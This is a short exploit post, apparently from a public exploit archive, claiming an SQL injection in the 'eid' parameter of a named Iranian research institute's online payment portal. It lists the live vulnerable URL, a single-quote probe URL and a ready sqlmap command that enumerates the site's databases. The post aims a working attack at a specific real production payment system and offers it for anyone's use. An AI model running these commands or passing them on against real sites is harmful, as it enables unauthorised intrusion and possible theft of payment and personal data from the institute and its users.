# Exploit Title:IPM Iran - Institute for Research in Fundamental Sciences SQLi
# Date: 25 Apr 2020
# Author: H.BBF3.4 & A.BBF3.4
+++++++++++++++++++++++++
ABOUT IPM Iran - Institute for Research in Fundamental Sciences :
The Institute for Research in Fundamental Sciences, previously Institute for Studies in Theoretical Physics and Mathematics, is an advanced public research institute in Tehran, Iran. IPM is directed by Mohammad Javad Larijani, its original founder. Wikipedia(https://en.wikipedia.org/wiki/Institute_for_Research_in_Fundamental_Sciences)
# SQL Injection Exploit :
**********************
event_pay.php?eid=
# Example Vulnerable Sites :
*************************
Online Payment gateway:
[+] https://payment.ipm.ir/portal/event_pay.php?eid=44
=> https://payment.ipm.ir/portal/event_pay.php?eid=44%27
SQLMAP:
sqlmap.py -u https://payment.ipm.ir/portal/event_pay.php?eid=44 --dbs
t.me/thebughunter